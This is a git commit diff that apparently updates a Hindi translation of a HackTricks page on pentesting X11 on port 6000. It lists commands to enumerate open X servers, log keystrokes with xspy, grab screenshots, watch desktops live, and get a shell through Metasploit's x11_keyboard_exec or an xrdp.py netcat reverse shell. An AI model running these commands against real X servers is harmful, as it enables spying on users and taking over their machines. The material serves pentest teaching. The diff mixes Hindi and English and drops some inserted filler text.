Translated ['network-services-pentesting/6000-pentesting-x11.md'] to in

This commit is contained in:
Translator 2023-12-29 16:53:38 +00:00
parent 439546bd5f
commit 93f513c903

View file

@ -1,69 +1,82 @@
# 6000 - पेंटेस्टिंग X11 # 6000 - Pentesting X11
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** * **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks रेपो में PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details> </details>
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof सभी क्रिप्टो बग बाउंटी के लिए घर है।** [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
**देरी के बिना पुरस्कार प्राप्त करें**\ **Hacking Insights**\
HackenProof बाउंटी तभी शुरू होती हैं जब उनके ग्राहक इनाम बजट जमा करते हैं। बग सत्यापित होने के बाद आपको इनाम मिलेगा। हैकिंग के रोमांच और चुनौतियों पर गहराई से जानकारी प्राप्त करें
**वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें**\ **Real-Time Hack News**\
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! उनके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें। रियल-टाइम न्यूज़ और अंतर्दृष्टि के माध्यम से तेजी से बदलते हैकिंग विश्व के साथ अप-टू-डेट रहें
**वेब3 हैकर लीजेंड बनें**\ **Latest Announcements**\
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें। नवीनतम बग बाउंटीज़ लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करें! **[**Discord**](https://discord.com/invite/N3FrSbmwdy) पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
{% embed url="https://hackenproof.com/register" %} ## मूल जानकारी
## मूलभूत जानकारी X Window System (उर्फ X) एक विंडोइंग सिस्टम है जो बिटमैप डिस्प्ले के लिए है, जो UNIX-आधारित ऑपरेटिंग सिस्टमों पर आम है। X एक GUI आधारित वातावरण के लिए बुनियादी ढांचा प्रदान करता है। X यूजर इंटरफेस को भी अनिवार्य नहीं करता है व्यक्तिगत प्रोग्राम इसे संभालते हैं।\
से: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
एक्स विंडो सिस्टम (या एक्स) बिटमैप डिस्प्ले के लिए एक विंडो सिस्टम है, जो UNIX आधारित ऑपरेटिंग सिस्टम पर सामान्य है। एक्स एक जीयूआई आधारित पर्यावरण के लिए मूल ढांचा प्रदान करता है। एक्स भी उपयोगकर्ता इंटरफ़ेस को निर्दिष्ट नहीं करता है - व्यक्तिगत कार्यक्रम इसे संभालते हैं।\
स्रोत: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
**डिफ़ॉल्ट पोर्ट:** 6000 **डिफ़ॉल्ट पोर्ट:** 6000
``` ```
PORT STATE SERVICE PORT STATE SERVICE
6000/tcp open X11 6000/tcp open X11
``` ```
## जांच ## सूचीकरण
**अनामत जुड़ाव की जांच करें:** **गुमनाम कनेक्शन** की जाँच करें:
```bash ```bash
nmap -sV --script x11-access -p <PORT> <IP> nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11 msf> use auxiliary/scanner/x11/open_x11
``` ```
#### स्थानीय जाँच #### स्थानीय गणना
उपयोगकर्ता के होम फ़ोल्डर में फ़ाइल **`.Xauthority`** को **X11 के लिए प्रमाणीकरण के लिए उपयोग** किया जाता है। [**यहाँ से**](https://stackoverflow.com/a/37367518): उपयोगकर्ता के होम फोल्डर में फाइल **`.Xauthority`** का उपयोग **X11 द्वारा प्राधिकरण के लिए किया जाता है**। [**यहाँ**](https://stackoverflow.com/a/37367518) से:
```bash
> MIT-magic-cookie-1: 128 बिट की कुंजी ("कुकी") उत्पन्न करना, इसे \~/.Xauthority (या जहां XAUTHORITY envvar इंट पॉइंट करता है) में संग्रहीत करना। क्लाइंट इसे सर्वर को सादा भेजता है! सर्वर यह जांचता है कि क्या उसके पास इस "कुकी" की एक प्रति है और यदि हां, तो कनेक्शन अनुमति दी जाती है। कुंजी DMX द्वारा उत्पन्न की जाती है। $ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X
00000030: 041d ef ...
```
> MIT-magic-cookie-1: 128 बिट की कुंजी ("कुकी") उत्पन्न करना, इसे \~/.Xauthority में संग्रहीत करना (या जहां XAUTHORITY envvar इंगित करता है)। क्लाइंट इसे सर्वर को सादे रूप में भेजता है! सर्वर जांचता है कि क्या उसके पास इस "कुकी" की एक प्रति है और यदि हां, तो कनेक्शन की अनुमति दी जाती है। कुंजी DMX द्वारा उत्पन्न की जाती है।
{% hint style="warning" %} {% hint style="warning" %}
**कुकी का उपयोग करने** के लिए आपको इन्वार वार्ता सेट करनी चाहिए: **`export XAUTHORITY=/path/to/.Xauthority`** कुकी का **उपयोग करने के लिए** आपको env var सेट करना चाहिए: **`export XAUTHORITY=/path/to/.Xauthority`**
{% endhint %} {% endhint %}
## कनेक्शन सत्यापन करें #### स्थानीय सूचीकरण सत्र
```bash
$ w
23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session
```
उदाहरण में, `localhost:0` पर xfce4-session चल रहा था।
## संबंध की पुष्टि करें
```bash ```bash
xdpyinfo -display <ip>:<display> xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0 xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
``` ```
## कीलॉगिंग ## कीलॉगिंग
[xspy](http://tools.kali.org/sniffingspoofing/xspy) कीबोर्ड की टाइपिंग को स्निफ करने के लिए। [xspy](http://tools.kali.org/sniffingspoofing/xspy) का उपयोग कीबोर्ड के कीस्ट्रोक्स को स्निफ करने के लिए किया जाता है
नमूना आउटपुट: नमूना आउटपुट:
``` ```
@ -73,74 +86,22 @@ opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123 swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
``` ```
## स्क्रीनशॉट कैप्चरिंग ## स्क्रीनशॉट्स कैप्चरिंग
To capture screenshots during a penetration test, you can use various tools and techniques. Here are some common methods:
### 1. Scrot
Scrot is a command-line tool that allows you to capture screenshots in Linux. You can install it using the following command:
```
sudo apt-get install scrot
```
To capture a screenshot, simply run the following command:
```
scrot screenshot.png
```
This will save the screenshot as `screenshot.png` in the current directory.
### 2. Shutter
Shutter is a feature-rich screenshot tool for Linux. You can install it using the following command:
```
sudo apt-get install shutter
```
Once installed, you can launch Shutter from the applications menu. It provides a graphical interface to capture screenshots and offers various editing options.
### 3. Flameshot
Flameshot is another popular screenshot tool for Linux. You can install it using the following command:
```
sudo apt-get install flameshot
```
To capture a screenshot, run the following command:
```
flameshot gui
```
This will open a graphical interface where you can capture and edit screenshots.
### 4. Snipping Tool (Windows)
If you are using Windows, you can use the built-in Snipping Tool to capture screenshots. Simply search for "Snipping Tool" in the Start menu and launch the application. It allows you to capture screenshots of selected areas or the entire screen.
### 5. Grab (macOS)
On macOS, you can use the built-in Grab tool to capture screenshots. You can find it in the Utilities folder, which is located in the Applications folder. Grab provides options to capture the entire screen, a specific window, or a selected area.
These are just a few examples of tools you can use to capture screenshots during a penetration test. Choose the one that best suits your needs and preferences.
```bash ```bash
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png convert screenshot.xwd screenshot.png
``` ```
## रिमोट डेस्कटॉप दृश्य ## रिमोट डेस्कटॉप दृश्य
यात्रा से: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) रास्ता से: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
``` ```
./xrdp.py <IP:0> ./xrdp.py <IP:0>
``` ```
यहां से: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) ```markdown
Way from: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
सबसे पहले हमें xwininfo का उपयोग करके विंडो की ID ढूंढ़नी होगी। सबसे पहले हमें xwininfo का उपयोग करके विंडो की ID पता करनी होगी
```
``` ```
xwininfo -root -display 10.9.xx.xx:0 xwininfo -root -display 10.9.xx.xx:0
@ -169,90 +130,68 @@ Corners: +0+0 -0+0 -0-0 +0-0
``` ```
**XWatchwin** **XWatchwin**
**लाइव देखे** के लिए हमें उपयोग करना होगा **लाइव देखे** के लिए हमें उपयोग करने की आवश्यकता है
```bash ```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo ./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45 ./xwatchwin 10.9.xx.xx:0 -w 0x45
``` ```
## शैल प्राप्त करें ## शेल प्राप्त करें
To get a shell on a target system, you can exploit vulnerabilities in the X11 server. Here are some techniques you can use:
### 1. X11 Forwarding
If the target system has X11 forwarding enabled, you can use it to run X11 applications remotely and potentially gain access to a shell. To do this, you need to have X11 forwarding enabled on your own system and establish a connection to the target system using SSH with X11 forwarding enabled.
### 2. X11 Injection
X11 injection involves injecting malicious code into a legitimate X11 application running on the target system. This can be done by exploiting vulnerabilities in the application or by intercepting and modifying the X11 protocol traffic between the client and server.
### 3. X11 Server Exploitation
If the target system is running an outdated or vulnerable X11 server, you can exploit known vulnerabilities to gain unauthorized access. This can involve exploiting buffer overflows, privilege escalation vulnerabilities, or other weaknesses in the X11 server software.
### 4. X11 Port Forwarding
X11 port forwarding allows you to forward X11 traffic from the target system to your own system. This can be useful if you want to access X11 applications running on the target system or if you want to exploit vulnerabilities in the X11 server.
Remember, when attempting to get a shell on a target system, it is important to ensure that you have proper authorization and are conducting the activity within the boundaries of the law.
``` ```
msf> use exploit/unix/x11/x11_keyboard_exec msf> use exploit/unix/x11/x11_keyboard_exec
``` ```
दूसरा तरीका: दूसरा तरीका:
**रिवर्स शेल:** Xrdp नेटकैट के माध्यम से रिवर्स शेल लेने की भी सुविधा प्रदान करता है। निम्नलिखित कमांड टाइप करें: **रिवर्स शेल:** Xrdp नेटकैट के माध्यम से रिवर्स शेल लेने की भी अनुमति देता है। निम्नलिखित कमांड टाइप करें:
**./xrdp.py \<IP:0> no-disp** **./xrdp.py \<IP:0> no-disp**
![](../.gitbook/assets/112217\_0051\_ExploitingX15.jpeg) ![](../.gitbook/assets/112217_0051_ExploitingX15.jpeg)
यह एक नया नियंत्रण पटल प्रदर्शित करेगा जहां हम R-शेल विकल्प देख सकते हैं, जो नीचे दिखाया गया है: यह एक नया कंट्रोल पैन खोलेगा जहां हम R-shell विकल्प देख सकते हैं, जो नीचे दिखाया गया है:
![](../.gitbook/assets/112217\_0051\_ExploitingX16.jpeg) ![](../.gitbook/assets/112217_0051_ExploitingX16.jpeg)
हम अपने स्थानीय सिस्टम में पोर्ट 5555 पर नेटकैट सुनने की स्थिति शुरू करेंगे, जो नीचे दिखाया गया है: हम अपने स्थानीय सिस्टम में पोर्ट 5555 पर नेटकैट सुनने का मोड शुरू करेंगे, जो नीचे दिखाया गया है:
![](../.gitbook/assets/112217\_0051\_ExploitingX17.jpeg) ![](../.gitbook/assets/112217_0051_ExploitingX17.jpeg)
फिर IP और पोर्ट जोड़ें और फिर R-शेल का चयन करें, जो नीचे दिखाया गया है: फिर IP और पोर्ट जोड़ें और फिर R-Shell चुनें, जो नीचे दिखाया गया है:
![](../.gitbook/assets/112217\_0051\_ExploitingX18.jpeg) ![](../.gitbook/assets/112217_0051_ExploitingX18.jpeg)
अब नीचे दिखाए गए तस्वीर में हमारे पास पूरी सिस्टम एक्सेस है: अब जैसा कि नीचे देखा जा सकता है हमारे पास पूरी सिस्टम एक्सेस है:
![](../.gitbook/assets/112217\_0051\_ExploitingX19.jpeg) ![](../.gitbook/assets/112217_0051_ExploitingX19.jpeg)
{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %} {% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %}
## शोडन ## Shodan
* `port:6000 x11` * `port:6000 x11`
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof क्रिप्टो बग बाउंटी का घर है।** [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
**देरी के बिना पुरस्कार प्राप्त करें**\ **हैकिंग इनसाइट्स**\
HackenProof बाउंटी केवल तब शुरू होती है जब उनके ग्राहक पुरस्कार बजट जमा करते हैं। आपको पुरस्कार उस बग के सत्यापित होने के बाद मिलेगा। हैकिंग के रोमांच और चुनौतियों के बारे में गहराई से जानकारी प्राप्त करें
**वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें**\ **रियल-टाइम हैक न्यूज**\
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! इसके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें। रियल-टाइम न्यूज और इनसाइट्स के माध्यम से हैकिंग की तेजी से बदलती दुनिया के साथ अपडेट रहें
**वेब3 हैकर लीजेंड बनें**\ **नवीनतम घोषणाएँ**\
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें। नवीनतम बग बाउंटीज के लॉन्च और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करना शुरू करें! [**Discord**](https://discord.com/invite/N3FrSbmwdy) पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
{% embed url="https://hackenproof.com/register" %}
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण करें।** * [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में **शामिल हों** या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PR करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में सबमिट करके।** * [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें
</details> </details>